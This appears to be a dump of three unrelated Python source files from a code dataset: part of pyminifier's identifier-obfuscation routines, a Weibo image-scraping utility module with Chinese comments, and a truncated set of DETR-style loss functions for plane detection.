if analyze.shebang.match(line): # (e.g. '#!/usr/bin/env python')
if not matched_shebang:
matched_shebang = True
skip_tokens += 1
elif analyze.encoding.match(line): # (e.g. '# -*- coding: utf-8 -*-')
if not matched_encoding:
matched_encoding = True
skip_tokens += 1
insert_in_next_line(tokens, skip_tokens, obfuscated_assignments)
def obfuscate_global_import_methods(module, tokens, name_generator, table=None):
"""
Replaces the used methods of globally-imported modules with obfuscated
equivalents. Updates *tokens* in-place.
*module* must be the name of the module we're currently obfuscating
If *table* is provided, replacements for import methods will be attempted
to be looked up there before generating a new unique name.
"""
global_imports = analyze.enumerate_global_imports(tokens)
#print("global_imports: %s" % global_imports)
local_imports = analyze.enumerate_local_modules(tokens, os.getcwd())
#print("local_imports: %s" % local_imports)
module_methods = analyze.enumerate_import_methods(tokens)
#print("module_methods: %s" % module_methods)
# Make a 1-to-1 mapping dict of module_method<->replacement:
if table:
replacement_dict = {}
for module_method in module_methods:
if module_method in table[0].keys():
replacement_dict.update({module_method: table[0][module_method]})
else:
replacement_dict.update({module_method: next(name_generator)})
# Update the global lookup table with the new entries:
table[0].update(replacement_dict)
else:
method_map = [next(name_generator) for i in module_methods]
replacement_dict = dict(zip(module_methods, method_map))
import_line = False
# Replace module methods with our obfuscated names in *tokens*
for module_method in module_methods:
for index, tok in enumerate(tokens):
token_type = tok[0]
token_string = tok[1]
if token_type != tokenize.NAME:
continue # Speedup
tokens[index + 1][1]
if token_string == module_method.split('.')[0]:
if tokens[index + 1][1] == '.':
if tokens[index + 2][1] == module_method.split('.')[1]:
if table: # Attempt to use an existing value
tokens[index][1] = table[0][module_method]
tokens[index + 1][1] = ""
tokens[index + 2][1] = ""
else:
tokens[index][1] = replacement_dict[module_method]
tokens[index + 1][1] = ""
tokens[index + 2][1] = ""
# Insert our map of replacement=what after each respective module import
for module_method, replacement in replacement_dict.items():
indents = []
index = 0
for tok in tokens[:]:
token_type = tok[0]
token_string = tok[1]
if token_type == tokenize.NEWLINE:
import_line = False
elif token_type == tokenize.INDENT:
indents.append(tok)
elif token_type == tokenize.DEDENT:
indents.pop()
elif token_string == "import":
import_line = True
elif import_line:
if token_string == module_method.split('.')[0]:
# Insert the obfuscation assignment after the import
imported_module = ".".join(module_method.split('.')[:-1])
if table and imported_module in local_imports:
line = "%s=%s.%s\n" % ( # This ends up being 6 tokens
replacement_dict[module_method],
imported_module,
replacement_dict[module_method]
)
else:
line = "%s=%s\n" % ( # This ends up being 6 tokens
replacement_dict[module_method], module_method)
for indent in indents: # Fix indentation
line = "%s%s" % (indent[1], line)
index += 1
insert_in_next_line(tokens, index, line)
index += 6 # To make up for the six tokens we inserted
index += 1
def obfuscate(module, tokens, options, name_generator=None, table=None):
"""
Obfuscates *tokens* in-place. *options* is expected to be the options
variable passed through from pyminifier.py.
*module* must be the name of the module we're currently obfuscating
If *name_generator* is provided it will be used to obtain replacement values
for identifiers. If not, a new instance of
If *table* is given (should be a list containing a single dictionary), it
will be used to perform lookups of replacements and any new replacements
will be added to it.
"""
# Need a universal instance of our generator to avoid duplicates
identifier_length = int(options.replacement_length)
ignore_length = False
if not name_generator:
if options.use_nonlatin:
ignore_length = True
if sys.version_info[0] == 3:
name_generator = obfuscation_machine(
use_unicode=True, identifier_length=identifier_length)
else:
print(
"ERROR: You can't use nonlatin characters without Python 3")
else:
name_generator = obfuscation_machine(
identifier_length=identifier_length)
if options.obfuscate:
variables = find_obfuscatables(
tokens, obfuscatable_variable, ignore_length=ignore_length)
classes = find_obfuscatables(
tokens, obfuscatable_class)
functions = find_obfuscatables(
tokens, obfuscatable_function)
for variable in variables:
replace_obfuscatables(
module,
tokens,
obfuscate_variable,
variable,
name_generator,
table
)
for function in functions:
replace_obfuscatables(
module,
tokens,
obfuscate_function,
function,
name_generator,
table
)
for _class in classes:
replace_obfuscatables(
module, tokens, obfuscate_class, _class, name_generator, table)
obfuscate_global_import_methods(module, tokens, name_generator, table)
obfuscate_builtins(module, tokens, name_generator, table)
else:
if options.obf_classes:
classes = find_obfuscatables(
tokens, obfuscatable_class)
for _class in classes:
replace_obfuscatables(
module,
tokens,
obfuscate_class,
_class,
name_generator,
table
)
if options.obf_functions:
functions = find_obfuscatables(
tokens, obfuscatable_function)
for function in functions:
replace_obfuscatables(
module,
tokens,
obfuscate_function,
function,
name_generator,
table
)
if options.obf_variables:
variables = find_obfuscatables(
tokens, obfuscatable_variable)
for variable in variables:
replace_obfuscatables(
module,
tokens,
obfuscate_variable,
variable,
name_generator,
table
)
if options.obf_import_methods:
obfuscate_global_import_methods(
module, tokens, name_generator, table)
if options.obf_builtins:
obfuscate_builtins(module, tokens, name_generator, table)
if __name__ == "__main__":
global name_generator
try:
source = open(sys.argv[1]).read()
except:
print("Usage: %s <filename.py>" % sys.argv[0])
sys.exit(1)
if sys.version_info[0] == 3:
name_generator = obfuscation_machine(use_unicode=True)
else:
name_generator = obfuscation_machine(identifier_length=1)
source = apply_obfuscation(source)
print(source)
|
the-stack_106_30639 | #!/usr/bin/env python3
# -*- coding: UTF-8 -*-
"""
一些有用的class和function: 所有路径为绝对路径
+ stream_tee(object): 日志记录
+ get_subdir(): 获取子文件夹列表
+ decode_imgurl(url, cookie): 解析微博imgref url
+ download_image_from_list: 从图片链接列表下载图片, 储存在user_id/images/fromlist/
+ repair_image_list(imglist_file): 修复图片链接列表中未解析链接
"""
import re
import os
import time
import requests
import traceback
import platform
import shutil
from bs4 import BeautifulSoup
from config import cookie
from config import pause_time
from config import line_to_buffer
from datetime import datetime
class stream_tee(object):
# from: http://www.tentech.ca/2011/05/stream-tee-in-python-saving-stdout-to-file-while-keeping-the-console-alive/
# Based on https://gist.github.com/327585 by Anand Kunal
def __init__(self, stream1, stream2):
self.stream1 = stream1
self.stream2 = stream2
self.__missing_method_name = None # Hack!
def __getattribute__(self, name):
return object.__getattribute__(self, name)
def __getattr__(self, name):
self.__missing_method_name = name # Could also be a property
return getattr(self, '__methodmissing__')
def __methodmissing__(self, *args, **kwargs):
# Emit method call to the log copy
callable2 = getattr(self.stream2, self.__missing_method_name)
callable2(*args, **kwargs)
# Emit method call to stdout (stream 1)
callable1 = getattr(self.stream1, self.__missing_method_name)
return callable1(*args, **kwargs)
def get_subdir(current_directory):
dirs = [x[0] for x in os.walk(current_directory)]
dirs = dirs[1:] # 第一项是current_directory
# 数字目录排序
# sorted([int(x.split(os.path.sep)[-1]) for x in dirs])
# max([int(x.split(os.path.sep)[-1]) for x in dirs])
return dirs
def decode_imgurl(imgref,cookie):
connection_timeout = 90
try_num = 1
imgurl = imgref
start_time = time.time()
while imgurl == imgref:
while True:
try:
html = requests.get(imgref,cookies=cookie, timeout=60)
break
except Exception:
if time.time() > start_time + connection_timeout:
raise Exception('Unable to get connection %s after %s seconds of ConnectionErrors' \
% (imgref, self.connection_timeout))
else:
time.sleep(1)
if html.url == imgref:
soup = BeautifulSoup(html.content,"lxml")
try:
imgurl = soup.findAll("a",href=re.compile(r'^http://',re.I))[0]['href']
except IndexError: # 读取过快导致未能读取网页,重新读取
print("读取过快")
imgurl = imgref
time.sleep(1)
else:
imgurl = html.url
try_num += 1
if try_num > 10:
print("解析失败.已达到最大尝试数10. 请手动解析")
return ""
print("解析成功: %s" % imgurl)
return imgurl
def download_image_from_list(filepath,start_position=1):
"""
从图片列表下载图片
输入:path/inputfile (txt,每行: weibo_title, imgurl)
输出:path/fromlist/
imgurl要求:http://******/name.jpg/ext
start_position:从第几条微博开始, 避免重复解析
"""
print("从" + filepath + "列表下载图片")
if not os.path.isfile(filepath):
print(filepath + "不存在")
return None
outpath = os.path.sep.join(filepath.split(os.path.sep)[:-1]) + \
os.path.sep + "images" + os.path.sep + "fromlist"
if not os.path.isdir(outpath):
os.makedirs(outpath)
# 假设文件名遵从 /weibo/user_id/img_list.txt
# user_id = int(filepath.split(os.path.sep)[-2])
subdirs = get_subdir(outpath)
if subdirs:
start_position = max([int(x.split(os.path.sep)[-1]) for x in subdirs])
else:
start_position = start_position
weibo_pic_count = 1
pre_weibo_title = 1
with open(filepath,"r") as f:
for line in f:
weibo_title = line.split(",")[0].strip()
imgurl = line.split(",")[1].strip()
if int(weibo_title) >= start_position:
if len(imgurl.split("/")[-1].split(".")) <= 1:
print("无效图片链接: %s" % imgurl)
if re.search(r'^https://.*',imgurl,re.I):
print("重新解析")
imgurl = decode_imgurl(imgurl,cookie)
if not imgurl:
weibo_pic_count += 1
continue
else:
weibo_pic_count += 1
continue
extension = imgurl[-4:] # .jpg
if pre_weibo_title != weibo_title:
weibo_pic_count = 1 # reset
pre_weibo_title = weibo_title
time.sleep(1)
temp_dir = outpath + os.path.sep + weibo_title
if not os.path.isdir(temp_dir):
os.makedirs(temp_dir)
temp = temp_dir + os.path.sep + str(weibo_pic_count) + extension
weibo_pic_count += 1
not_connected = False
start_time = time.time()
while True:
try:
r = requests.get(imgurl,stream=True)
break
except Exception as e:
if time.time() > start_time + 90:
not_connected = True
raise Exception('Unable to get connection %s (download image) after 60 \
seconds of ConnectionErrors.跳过' % (imgurl))
else:
time.sleep(1)
if not_connected:
continue
elif r.status_code == 200:
if not os.path.isfile(temp):
with open(temp,'wb') as f:
for chunk in r.iter_content(chunk_size=512 * 1024):
f.write(chunk)
print("已下载: %s, %s, %s" % (weibo_title, weibo_pic_count-1,imgurl))
else:
print("文件已存在: %s, %s, %s" % (weibo_title, weibo_pic_count-1,imgurl))
print("全部图片下载完成: " + outpath)
def repair_image_list(filepath):
"""
修复图片中未解析链接
输入:path/inputfile (txt,每行: weibo_title, imgurl)
输出: path/inputfile-new
"""
print("列表: " + filepath)
if not os.path.isfile(filepath):
print(filepath + "不存在")
return None
outpath = os.path.sep.join(filepath.split(os.path.sep)[:-1])
filename, ext = filepath.split(os.path.sep)[-1].split('.')
backup_path = outpath + os.path.sep + filename + '-' + datetime.now().strftime('%Y-%m-%d-%H-%M') + '.' + ext
shutil.copy2(filepath, backup_path)
newname = outpath + os.path.sep + filename+ "-new." + ext
# 假设文件名遵从 /weibo/user_id/img_list.txt
# user_id = int(filepath.split(os.path.sep)[-2])
fo = open(newname,"w")
line_count = 1
with open(filepath,"r") as f:
for line in f:
weibo_title = line.split(",")[0].strip()
imgurl = line.split(",")[1].strip()
if len(imgurl.split("/")[-1].split(".")) <= 1:
print("无效链接: %s, %s" % (weibo_title,imgurl))
newurl = decode_imgurl(imgurl,cookie)
if newurl:
imgurl = newurl
print("重新解析: %s, %s" %(weibo_title, imgurl))
else:
print("%s, %s" % (weibo_title, imgurl))
fo.write(weibo_title + ", " + imgurl + "\n")
line_count +=1
fo.close()
os.rename(newname, filepath)
def reformat_time(time_string):
if len(time_string) >= 16:
year = time_string[:4]
month = time_string[5:7]
day = time_string[8:10]
hour = time_string[11:13]
minute = time_string[14:16]
return year + month + day + hour + minute
else:
return time_string
def read_weibo_file(inputfile):
try:
f = open(inputfile,'rt', encoding='utf-8')
except Exception as e:
print(e)
last_line = ""
# 用户信息
next(f) # 用户信息
username = next(f)[5:].strip()
user_id = int(next(f)[5:])
weibo_num = int(next(f)[4:])
following = int(next(f)[4:])
followers = int(next(f)[4:])
next(f)
next(f)
user = {"username":username,"user_id":user_id,"weibo_num":weibo_num,"following":following,"followers":followers}
content = []
meta = []
publish_time = []
weibo_num = 0
weibo_content = ""
for line in f:
if line != '\n':
if re.search(r'^发布时间.*',line):
publish_time.append(line[5:].strip())
elif re.search(r'^点赞数.*',line):
pattern = r"\d+\.?\d*"
guid = re.findall(pattern,line,re.S | re.M)
up_num = int(guid[0])
retweet_num = int(guid[1])
comment_num = int(guid[2])
meta.append({"up_num":up_num,"retweet_num":retweet_num,"comment_num":comment_num})
else:
weibo_content = weibo_content + line
else:
content.append(':'.join(weibo_content.split(':')[1:]).strip())
weibo_content = ""
weibo_num += 1
# 检查空集
if len(content) < weibo_num:
content.append("")
if len(meta) < weibo_num:
meta.append({"up_num":0,"retweet_num":0,"comment_num":0})
if len(publish_time) < weibo_num:
publish_time.append("2088-12-12 12:12")
last_line = line
# 补全不完全信息
if last_line != '\n':
weibo_num = weibo_num + 1
if len(content) < weibo_num:
content.append("")
if len(meta) < weibo_num:
meta.append({"up_num":0,"retweet_num":0,"comment_num":0})
if len(publish_time) < weibo_num:
publish_time.append("2088-12-12 12:12")
return {"user":user,"content":content,"publish_time":publish_time,"meta":meta}
def decode_imgreflist(inputfile,start_position=1):
if not os.path.isfile(inputfile):
print("文件不存在 %s" % inputfile)
return
# 写出文件
print("解析imgref列表:" + inputfile.split(os.path.sep)[-1])
outpath = os.path.sep.join(inputfile.split(os.path.sep)[:-1])
file_path = outpath + os.path.sep + "img_list.txt"
if os.path.isfile(file_path):
backup_path = outpath + os.path.sep + "img_list-" + datetime.now().strftime('%Y-%m-%d-%H-%M') + ".txt"
print("备份 %s > %s" % (file_path.split(os.path.sep)[-1], backup_path.split(os.path.sep)[-1]))
os.rename(file_path, backup_path)
fo = open(file_path,"w",line_to_buffer)
img_weibo_count = 0
img_count = 0
with open(inputfile,'r') as f:
for line in f:
if line.strip():
weibo_title, refurl = line.split(',')
if int(weibo_title) >= start_position:
if re.search(r'^http://weibo.cn/mblog/oripic.*', refurl.strip(), re.I):
imgref = refurl.strip()
if imgref:
print("正在解析第%d条微博原图" % int(weibo_title))
newurl = decode_imgurl(imgref,cookie)
if newurl:
print("已解析")
fo.write(weibo_title + ', ' + newurl + '\n')
img_count += 1
img_weibo_count += 1
elif re.search(r'^http://weibo.cn/mblog/picAll.*', refurl.strip(), re.I):
imgsetref = refurl.strip()
if imgsetref:
print("正在解析第%d条微博组图" % int(weibo_title))
try:
html = requests.get(imgsetref,cookies=cookie).content
soup = BeautifulSoup(html,"lxml")
imgurl_set = soup.findAll('a',href=re.compile(r'^/mblog/oripic',re.I))
total_pics = len(imgurl_set)
set_count = 1
for imgrefpack in imgurl_set:
imgref = 'http://weibo.cn' + re.sub(r"amp;", '', imgrefpack['href'])
newurl = decode_imgurl(imgref,cookie)
if newurl:
print("已解析组图第%d条/共%d条" % (set_count, total_pics))
fo.write(weibo_title + ', ' + newurl + '\n')
set_count += 1
img_count += 1
img_weibo_count += 1
time.sleep(pause_time)
except Exception as e:
traceback.print_exc()
print(e)
fo.close()
print("所有链接解析完毕")
print("共%d条配图微博,共%d张图片" % (img_weibo_count,img_count))
print("储存于: " + file_path)
def remove_nbws(text):
""" remove unwanted unicode punctuation: zwsp, nbws, \t, \r, \r.
"""
# ZWSP: Zero width space
text = text.replace(u'\u200B', '')
# NBWS: Non-breaking space
text = text.replace(u'\xa0', ' ')
# HalfWidth fullstop
text = text.replace(u'\uff61', '')
# Bullet
text = text.replace(u'\u2022', '')
# White space
text = text.replace(u'\t', ' ').replace(u'\r', ' ')
# General Punctuation
gpc_pattern = re.compile(r'[\u2000-\u206F]')
text = gpc_pattern.sub('', text)
# Mathematical Operator
mop_pattern = re.compile(r'[\u2200-\u22FF]')
text = mop_pattern.sub('', text)
# Combining Diacritical Marks
dcm_pattern = re.compile(r'[\u0300-\u036F]')
text = dcm_pattern.sub('', text)
# Hangul Syllable
hangul_pattern = re.compile(r'[\uac00-\ud7af]')
text = hangul_pattern.sub('',text)
lsp_pattern = re.compile(r'[\x80-\xFF]')
text = lsp_pattern.sub('', text)
return text
def legitimize(text, myos=platform.system()):
"""Converts a string to a valid filename.
credit: soimort/you-get.
option: filename.
"""
# POSIX systems
text = text.translate({
0: None,
ord('/'): '-',
ord('|'): '-',
ord(':'): '-',
ord('\uFF1A'): ' ',
})
if myos == 'Windows':
# Windows (non-POSIX namespace)
text = text.translate({
# Reserved in Windows VFAT and NTFS
ord(':'): '-',
ord('\uFF1A'): ' ',
ord('*'): '-',
ord('?'): '-',
ord('\\'): '-',
ord('\"'): '\'',
# Reserved in Windows VFAT
ord('+'): '-',
ord('<'): '-',
ord('>'): '-',
ord('['): '(',
ord(']'): ')',
})
else:
# *nix
if myos == 'Darwin':
# Mac OS HFS+
text = text.translate({
ord(':'): '-',
})
# Remove leading .
if text.startswith("."):
text = text[1:]
text = text[:80] # Trim to 82 Unicode characters long
return text
def check_backup(working_path, frequency='1'):
""" Check if files exist in working-path and make a copy
option: 1: only make one backup, other: make backup based on time
"""
if os.path.isdir(working_path):
files = [f for f in os.listdir(working_path) if os.path.isfile(working_path + os.path.sep + f)]
if len(files) > 0:
if frequency == '1':
backup_dir = working_path + os.path.sep + "latest_backup"
else:
backup_dir = working_path + os.path.sep + legitimize(datetime.now().strftime('%Y%m%d-%H%M'))
if not os.path.isdir(backup_dir):
os.makedirs(backup_dir)
for i in range(0, len(files)):
shutil.copy2(working_path + os.path.sep + files[i], backup_dir + os.path.sep + files[i])
def create_picText(working_path, user_id):
# work path = "SinaSpider-master\weibo\user_id"
texts = read_weibo_file(working_path + os.path.sep + str(user_id) + '.txt')
#userprofile = texts['user'] # {"username":username,"user_id":user_id,"weibo_num":weibo_num,"following":following,"followers":followers}
weibo_content = texts['content'] # string
publish_time = texts['publish_time']# ["2088-12-12 12:12"]
#meta = texts['meta'] # [{"up_num":up_num,"retweet_num":retweet_num,"comment_num":comment_num}]
picPath = working_path + os.path.sep + 'images' + os.path.sep + 'fromlist'
all_picDirectories = [x[0] for x in os.walk(picPath)][1:]
for _onePic in all_picDirectories:
_index = int(_onePic.split(os.path.sep)[-1])
_text = publish_time[_index-1] + os.linesep + weibo_content[_index-1]
f = open(_onePic + os.path.sep + 'text.txt', "wt", encoding='utf-8')
f.write(_text)
f.close()
print("图片文字录入完毕: %s" % (str(_index) + ": " + publish_time[_index-1]))
|
the-stack_106_30644 | import torch
import torch.nn.functional as F
from torch import nn
import torch.distributed as dist
import numpy as np
@torch.no_grad()
def accuracy(output, target, topk=(1,)):
"""Computes the precision@k for the specified values of k"""
if target.numel() == 0:
return [torch.zeros([], device=output.device)]
maxk = max(topk)
batch_size = target.size(0)
_, pred = output.topk(maxk, 1, True, True)
pred = pred.t()
correct = pred.eq(target.view(1, -1).expand_as(pred))
res = []
for k in topk:
correct_k = correct[:k].view(-1).float().sum(0)
res.append(correct_k.mul_(100.0 / batch_size))
return res
def get_world_size():
if not is_dist_avail_and_initialized():
return 1
return dist.get_world_size()
def is_dist_avail_and_initialized():
if not dist.is_available():
return False
if not dist.is_initialized():
return False
return True
class SetCriterion(nn.Module):
""" This class computes the loss for DETR.
The process happens in two steps:
1) we compute hungarian assignment between ground truth boxes and the outputs of the model
2) we supervise each pair of matched ground-truth / prediction (supervise class and box)
"""
def __init__(self, num_classes, matcher, weight_dict, eos_coef, losses, k_inv_dot_xy1):
""" Create the criterion.
Parameters:
num_classes: number of object categories, omitting the special no-object category
matcher: module able to compute a matching between targets and proposals
weight_dict: dict containing as key the names of the losses and as values their relative weight.
eos_coef: relative classification weight applied to the no-object category
losses: list of all the losses to be applied. See get_loss for list of available losses.
"""
super().__init__()
self.num_classes = num_classes
self.matcher = matcher
self.weight_dict = weight_dict
self.eos_coef = eos_coef
self.losses = losses
self.k_inv_dot_xy1 = k_inv_dot_xy1 # 3, hw
empty_weight = torch.ones(self.num_classes + 1)
empty_weight[-1] = self.eos_coef
# empty_weight[-2] = 3
self.register_buffer('empty_weight', empty_weight)
def loss_labels(self, outputs, targets, indices, num_planes, log=True):
"""Classification loss (NLL)
targets dicts must contain the key "labels" containing a tensor of dim [nb_target_boxes]
"""
assert 'pred_logits' in outputs
src_logits = outputs['pred_logits']
idx = self._get_src_permutation_idx(indices)
target_classes_o = torch.cat([tgt[:, 0][J].long() for tgt, (_, J) in zip (targets, indices)])
target_classes = torch.full(src_logits.shape[:2], self.num_classes, dtype=torch.int64, device=src_logits.device)
target_classes[idx] = target_classes_o
# print("idx = ", idx)
# print("target_classes.shape = ", target_classes.shape)
# print("target_classes = ", target_classes)
# print("src_logits.shape = ", src_logits.shape)
# print("empty_weight = ", self.empty_weight)
# exit()
##################### 2020.2.28
# loss_ce = F.cross_entropy(src_logits.transpose(1, 2), target_classes, self.empty_weight.cuda(), ignore_index=0)
loss_ce = F.cross_entropy(src_logits.transpose(1, 2), target_classes, self.empty_weight.cuda())
# import pdb
# pdb.set_trace()
losses = {'loss_ce': loss_ce}
if log:
# TODO this should probably be a separate loss, not hacked in this one here
losses['class_error'] = 100 - accuracy(src_logits[idx], target_classes_o)[0]
return losses
@torch.no_grad()
def loss_cardinality(self, outputs, targets, indices, num_planes):
""" Compute the cardinality error, ie the absolute error in the number of predicted non-empty boxes
This is not really a loss, it is intended for logging purposes only. It doesn't propagate gradients
"""
pred_logits = outputs['pred_logits']
device = pred_logits.device
tgt_lengths = torch.as_tensor([tgt.shape[0] for tgt in targets], device=device)
card_pred = (pred_logits.argmax(-1) != pred_logits.shape[-1] - 1).sum(1)
card_err = F.l1_loss(card_pred.float(), tgt_lengths.float())
losses = {'cardinality_error': card_err}
return losses
def loss_param(self, outputs, targets, indices, num_planes, log=True):
"""Compute the losses related to the bounding boxes, the L1 regression loss and the GIoU loss
targets dicts must contain the key "boxes" containing a tensor of dim [nb_target_boxes, 4]
The target boxes are expected in format (center_x, center_y, h, w), normalized by the image size.
"""
assert 'pred_param' in outputs
idx = self._get_src_permutation_idx(indices)
src_param = outputs['pred_param'][idx] # N, 3
target_param = torch.cat([tgt[:, 1:4][i] for tgt, (_, i) in zip(targets, indices)], dim=0)
# l1 loss
loss_param_l1 = torch.mean(torch.sum(torch.abs(target_param - src_param), dim=1))
# cos loss
similarity = torch.nn.functional.cosine_similarity(src_param, target_param, dim=1) # N
loss_param_cos = torch.mean(1-similarity)
angle = torch.mean(torch.acos(torch.clamp(similarity, -1, 1)))
losses = {}
losses['loss_param_l1'] = loss_param_l1
losses['loss_param_cos'] = loss_param_cos
if log:
losses['mean_angle'] = angle * 180.0 / np.pi
return losses
def loss_center(self, outputs, targets, indices, num_planes, log=True):
"""Compute the losses related to the bounding boxes, the L1 regression loss and the GIoU loss
targets dicts must contain the key "boxes" containing a tensor of dim [nb_target_boxes, 4]
The target boxes are expected in format (center_x, center_y, h, w), normalized by the image size.
"""
assert 'pred_center' in outputs
idx = self._get_src_permutation_idx(indices)
src_center = outputs['pred_center'][idx] # N, 2
target_center = torch.cat([tgt[:, 4:6][i] for tgt, (_, i) in zip(targets, indices)], dim=0)
# print('src center = \n', src_center.detach().cpu().numpy())
# print('tgt_center = \n', target_center.detach().cpu().numpy())
# exit()
# l1 loss
delta_xy = torch.abs(target_center - src_center) # N, 2
dist = torch.norm(delta_xy, dim=-1) # N
loss_center_l2 = torch.mean(dist)
losses = {}
losses['loss_center_instance'] = loss_center_l2
'''
pixel_center = outputs['pixel_center'] # b, 2, h, w
b, _, h, w = pixel_center.shape
assert b == len(targets)
loss_center_l2_pixel = 0.
for bi in range(b):
indices_bi = indices[bi]
idx_out = indices_bi[0]
idx_tgt = indices_bi[1]
segmentation = outputs['gt_instance_map'][bi] # 21, h, w
cur_pxiel_center = pixel_center[bi] # 2, h, w
loss_bi = 0.
for pi in range(num_planes):
gt_plane_idx = int(idx_tgt[pi])
mask = segmentation[gt_plane_idx, :, :].view(1, h, w)
mask = mask > 0
centers = torch.masked_select(cur_pxiel_center, mask).view(2, -1) # 2, n
gt_center = targets[bi][gt_plane_idx, 4:6].contiguous().view(2, 1)
loss_dist = torch.norm(torch.abs(centers - gt_center), dim=0).mean()
loss_bi += loss_dist
loss_bi = loss_bi / num_planes
loss_center_l2_pixel += loss_bi
loss_center_l2_pixel = loss_center_l2_pixel / bi
losses['loss_center_pixel'] = loss_center_l2_pixel
'''
if 'gt_plane_pixel_centers' in outputs.keys():
gt_plane_pixel_centers = outputs['gt_plane_pixel_centers']
pixel_center = outputs['pixel_center'] # b, 2, h, w
valid_region = outputs['valid_region'] # b, 1, h, w
mask = valid_region > 0
pixel_dist = torch.norm(torch.abs(gt_plane_pixel_centers - pixel_center), dim=1, keepdim=True) #b, 1, h, w
loss_pixel_center = torch.mean(pixel_dist[mask])
losses['loss_center_pixel'] = loss_pixel_center
return losses
def loss_embedding(self, outputs, targets, indices, num_planes_sum, log=True, t_pull=0.5, t_push=1.5):
embedding_pixel = outputs['pixel_embedding'] # b, c, h, w
embedding_instance = outputs['pred_plane_embedding'] # b, num_query, c
b, c, h, w = embedding_pixel.shape
assert b == len(targets)
pull_losses = 0.
push_losses = 0.
losses = 0.
for bi in range(b):
embedding = embedding_pixel[bi, :, :, :].contiguous()
num_planes = targets[bi].shape[0]
device = embedding.device
indices_bi = indices[bi]
idx_out = indices_bi[0]
idx_tgt = indices_bi[1]
assert idx_tgt.max()+1 == num_planes
segmentation = outputs['gt_instance_map'][bi] # 21, h, w
embeddings = []
centers = []
# select embedding with segmentation
for i in range(num_planes):
gt_plane_idx = int(idx_tgt[i])
mask = segmentation[gt_plane_idx, :, :].view(1, h, w)
mask = mask > 0
feature = torch.transpose(torch.masked_select(embedding, mask).view(c, -1),
0, 1)
embeddings.append(feature) # plane_pt_num, c
pred_plane_idx = int(idx_out[i])
center = embedding_instance[bi, pred_plane_idx, :].contiguous().view(1, c)
centers.append(center)
# intra-embedding loss within a plane
pull_loss = torch.Tensor([0.0]).to(device)
for feature, center in zip(embeddings, centers):
# l2 dist
dis = torch.norm(feature - center, 2, dim=1) - t_pull
dis = F.relu(dis)
pull_loss += torch.mean(dis)
# cos dist
# dis_cos = 1 - F.cosine_similarity(feature, center, dim=1) - 0.01519
# dis_cos = F.relu(dis_cos)
# pull_loss += torch.mean(dis_cos)
# print(torch.mean(dis))
# print(torch.mean(dis_cos))
pull_loss /= int(num_planes)
if num_planes == 1:
losses += pull_loss
pull_losses += pull_loss
push_losses += 0.
continue
# inter-plane loss
centers = torch.cat(centers, dim=0) # n, c
A = centers.repeat(1, int(num_planes)).view(-1, c)
B = centers.repeat(int(num_planes), 1)
distance = torch.norm(A - B, 2, dim=1).view(int(num_planes), int(num_planes))
# distance_cos = 1 - F.cosine_similarity(A, B, dim=1).view(int(num_planes), int(num_planes))
# select pair wise distance from distance matrix
eye = torch.eye(int(num_planes)).to(device)
pair_distance = torch.masked_select(distance, eye == 0)
# pair_distance_cos = torch.masked_select(distance_cos, eye == 0)
# import pdb
# pdb.set_trace()
# l2 dist
pair_distance = t_push - pair_distance
pair_distance = F.relu(pair_distance)
push_loss = torch.mean(pair_distance).view(-1)
# cos dist
# pair_distance_cos = 1.0 - pair_distance_cos
# pair_distance_cos = F.relu(pair_distance_cos)
# push_loss += torch.mean(pair_distance_cos).view(-1)
loss = pull_loss + push_loss
losses += loss
pull_losses += pull_loss
push_losses += push_loss
losses_dict = {}
losses_dict['loss_embedding'] = losses / float(b)
if log:
losses_dict['loss_pull'] = pull_losses / float(b)
losses_dict['loss_push'] = push_losses / float(b)
return losses_dict
def loss_Q(self, outputs, targets, indices, num_planes_sum, log=True):
gt_depths = outputs['gt_depth'] # b, 1, h, w
b, _, h, w = gt_depths.shape
assert b == len(targets)
losses = 0.
for bi in range(b):
num_planes = targets[bi].shape[0]
segmentation = outputs['gt_instance_map'][bi] # 21, h, w
device = segmentation.device
depth = gt_depths[bi] # 1, h, w
k_inv_dot_xy1_map = (self.k_inv_dot_xy1).clone().view(3, h, w).to(device)
gt_pts_map = k_inv_dot_xy1_map * depth # 3, h, w
indices_bi = indices[bi]
idx_out = indices_bi[0]
idx_tgt = indices_bi[1]
assert idx_tgt.max() + 1 == num_planes
# select pixel with segmentation
loss_bi = 0.
for i in range(num_planes):
gt_plane_idx = int(idx_tgt[i])
mask = segmentation[gt_plane_idx, :, :].view(1, h, w)
mask = mask > 0
pts = torch.masked_select(gt_pts_map, mask).view(3, -1) # 3, plane_pt_num
pred_plane_idx = int(idx_out[i])
param = outputs['pred_param'][bi][pred_plane_idx].view(1, 3)
# param = targets[bi][gt_plane_idx, 1:].view(1, 3)
#########################################
# param_gt = targets[bi][gt_plane_idx, 1:4].view(1, 3)
# gt_err = torch.mean(torch.abs(torch.matmul(param_gt, pts) - 1)) # 1, plane_pt_num
# print(gt_err)
#########################################
loss = torch.abs(torch.matmul(param, pts) - 1) # 1, plane_pt_num
loss = loss.mean()
loss_bi += loss
loss_bi = loss_bi / float(num_planes)
losses += loss_bi
# exit()
losses_dict = {}
losses_dict['loss_Q'] = losses / float(b)
return losses_dict
def loss_depth(self, outputs, targets, indices, num_planes_sum, log=True):
gt_pixel_depth = outputs['gt_depth']
pred_pixel_depth = outputs['pixel_depth']
mask = (gt_pixel_depth > 1e-4).float()
loss = torch.sum(torch.abs(pred_pixel_depth - gt_pixel_depth) * mask) / torch.clamp(mask.sum(), min=1)
losses = {'loss_depth_pixel': loss}
# import pdb
# pdb.set_trace()
if 'final_depth' in outputs.keys():
if 'final_depth' in outputs.keys():
pred_final_depth = outputs['final_depth']
loss_final_depth = torch.sum(torch.abs(pred_final_depth - gt_pixel_depth) * mask) / torch.clamp(
mask.sum(), min=1)
losses['loss_final_depth'] = loss_final_depth
if 'final_depth_ref' in outputs.keys():
pred_final_depth_ref = outputs['final_depth_ref']
loss_final_depth_ref = torch.sum(torch.abs(pred_final_depth_ref - gt_pixel_depth) * mask) / torch.clamp(
mask.sum(), min=1)
losses['loss_final_depth_ref'] = loss_final_depth_ref
return losses
def loss_prob_pixel(self, outputs, targets, indices, num_planes_sum, log=True):
gamma = 2.
alpha = 0.25
gt_semantic = outputs['gt_semantic'] # b, 1, h, w
pred_pixel_plane_prob = outputs['pixel_plane_prob'] # b, 1, h, w
pred_pixel_plane_prob = torch.sigmoid(pred_pixel_plane_prob) # b, 1, h, w
loss = - alpha * (1 - pred_pixel_plane_prob) ** gamma * gt_semantic * torch.log(pred_pixel_plane_prob) \
- (1 - alpha) * pred_pixel_plane_prob ** gamma * (1 - gt_semantic) * torch.log(1 - pred_pixel_plane_prob)
loss = torch.mean(loss)
losses = {'loss_prob_pixel': loss}
